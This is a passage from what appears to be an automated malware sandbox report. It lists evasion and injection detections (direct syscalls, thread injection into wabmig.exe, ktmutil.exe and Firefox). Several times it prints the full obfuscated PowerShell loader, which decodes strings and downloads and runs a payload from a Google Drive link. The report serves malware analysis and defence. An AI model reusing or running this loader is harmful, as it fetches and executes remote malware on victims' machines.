          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A4547F mov eax, dword ptr fs:[00000030h]10_2_21A4547F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199A470 mov eax, dword ptr fs:[00000030h]10_2_2199A470
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199A470 mov eax, dword ptr fs:[00000030h]10_2_2199A470
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199A470 mov eax, dword ptr fs:[00000030h]10_2_2199A470
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F453 mov eax, dword ptr fs:[00000030h]10_2_21A2F453
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971460 mov eax, dword ptr fs:[00000030h]10_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971460 mov eax, dword ptr fs:[00000030h]10_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971460 mov eax, dword ptr fs:[00000030h]10_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971460 mov eax, dword ptr fs:[00000030h]10_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971460 mov eax, dword ptr fs:[00000030h]10_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198F460 mov eax, dword ptr fs:[00000030h]10_2_2198F460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A437B6 mov eax, dword ptr fs:[00000030h]10_2_21A437B6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F78A mov eax, dword ptr fs:[00000030h]10_2_21A2F78A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199D7B0 mov eax, dword ptr fs:[00000030h]10_2_2199D7B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F7BA mov eax, dword ptr fs:[00000030h]10_2_2196F7BA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7512.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 2828Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3200000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: D3F800Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
